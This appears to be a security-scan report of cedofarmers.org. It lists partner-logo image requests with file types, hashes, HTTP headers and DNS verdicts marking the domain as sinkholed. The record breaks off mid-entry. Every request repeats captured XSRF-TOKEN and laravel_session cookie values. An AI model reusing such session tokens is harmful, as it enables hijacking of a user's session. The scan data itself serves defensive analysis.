File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 350x250, components 3
Hash 2a2b582fd8bb85562958aff0652d7ce7
12b58f32d012f37e5345c597c8c09ee3fdf0998e
d05b2d85e1698a37648d2a31cf94ce693cf19fbcf10c34cd7712493e8792e0eb
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226219-RHSP_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:38 GMT
accept-ranges: bytes
content-length: 9556
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226049-concern_logo.png
192.185.57.117 200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226049-concern_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Hash 554c7995c6fc7c2b5296488df5890258
5ddfb85c9140fb6154fd367517faab935e24ab57
754877b85cfc8583e983f4b4012570e6e7900e25ac72aaeb72b5393c73838b10
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226049-concern_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:48 GMT
accept-ranges: bytes
content-length: 12627
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226123-ISSDUganda_logo.gif
192.185.57.117 200 OK 14 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226123-ISSDUganda_logo.gif
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type GIF image data, version 89a, 280 x 108
Hash a91ea5feb010fc00dc507da48df2bb08
d8bb71422001c5e5b297384972836747804cabeb
85dda7d730462d957e02f093456c1490a0337de25ba19a2a06a24a82623f347d
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226123-ISSDUganda_logo.gif HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:02 GMT
accept-ranges: bytes
content-length: 13761
content-type: image/gif
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226020-AgVerify_logo.png
192.185.57.117 200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226020-AgVerify_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 102 x 100, 8-bit/color RGBA, non-interlaced
Hash 3a77e0e97be8d382c49a0bea0e7b96ee
97e6ae8f29a688171daf8fb0ae76227a94748486
2f5bce4713af81495b4af3268b84565aa32675d402d7520ba3366cf0dbdfb1a3
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226020-AgVerify_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:20 GMT
accept-ranges: bytes
content-length: 13108
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226212-peacecorps_logo.png
192.185.57.117 200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226212-peacecorps_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced (file's keep-going pass also reported "Minix filesystem, V1 (big endian), 1140 zones"; that is almost certainly a spurious match on compressed IDAT bytes sitting at the Minix superblock offset, not an embedded filesystem, and the single primary type is what matters here)
Hash 36201ea364ca857180650ef26d4c261d
be94a53efc6cfaed7440e11c3e805d31952a7194
7a17429bfe71b4562c9bceae1f22f3f54567da2528778683c428ebb65a215e07
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226212-peacecorps_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:32 GMT
accept-ranges: bytes
content-length: 12921
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226026-azuri_logo.png
192.185.57.117 200 OK 15 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226026-azuri_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 140 x 94, 8-bit/color RGBA, non-interlaced
Hash 66294f8bd37606f90bffc393fc904580
dc5157ff63ed21fcf0436418ee9f951b23b374c9
bd91ec976f613f95b085817dccd53abb9069a01e1acf27d36c36f50f534c9792
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226026-azuri_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:26 GMT
accept-ranges: bytes
content-length: 15194
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/img/cedo_logo.png
192.185.57.117 200 OK 16 kB URL HTTP/2 cedofarmers.org/img/cedo_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 300 x 94, 8-bit/color RGBA, non-interlaced
Hash b651660d68c75f78e3978f00936cb68c
a7f21fe219c254e2ae32bffdb8a6dada4d22818c
2ed1f32cd719b7a33baaa6e83983e9f3359f6a14004ad0b7b879f605f1567959
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /img/cedo_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 02 May 2019 04:07:06 GMT
accept-ranges: bytes
content-length: 15783
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226163-muk_logo.jpg
192.185.57.117 200 OK 16 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226163-muk_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 244x207, components 3
Hash 61b27a12a411b114288abec230530cea
fe28d81a4e39588110377c1daae4c1d3e1907334
d8709f607a3ba10f8cce62e8aed817b01560029503f8fc04654087039d4403f6
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226163-muk_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:42 GMT
accept-ranges: bytes
content-length: 16210
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226015-AgResults_logo.png
192.185.57.117 200 OK 17 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226015-AgResults_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 239 x 90, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 b940f566411a53bf2bcc5236296f4541
SHA1 c433b0bd09151992a7fd93c4dd89231a73749558
SHA256 40fcdd32c8646567df6634909a9ff559a7ef474f12f19c06bd2bb8578cecd66a
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226015-AgResults_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:14 GMT
accept-ranges: bytes
content-length: 17025
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604667006-SDC.png
192.185.57.117 200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604667006-SDC.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 389 x 129, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 5feaa2561972e1f1936d27afa46f8073
SHA1 9a131c67f0cbdcdab6b68111d488f4ed470d19f5
SHA256 4d4ac6c810b35e9bc899bbca7ea1945f34c1587b8d05de854afa1c96743fd0e0
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604667006-SDC.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:50:06 GMT
accept-ranges: bytes
content-length: 17630
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226182-nutreal_logo.png
192.185.57.117 200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226182-nutreal_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 314 x 133, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 1d0e4e690cd2fb73a223791f6927df16
SHA1 806f6fdca255063da5403e63f947f44cf5918fa0
SHA256 cabeb13a9695700c0597e6b33b223fce17a698ba5409637fb76489234d8f4f2e
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226182-nutreal_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:02 GMT
accept-ranges: bytes
content-length: 17488
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226145-mamedicot_logo.jpg
192.185.57.117 200 OK 17 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226145-mamedicot_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 319x170, components 3
- data
Hash MD5 f17dffa45410e3b7055e9b5c42db9887
SHA1 c25736b1ff2d855ae9b667333c1265fd3ec7fb82
SHA256 427e42a5cc5181d1b1ac27bec35c139578d4b3989cc4570a1c7aa147d6a34f8d
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226145-mamedicot_logo.jpg HTTP/1.1
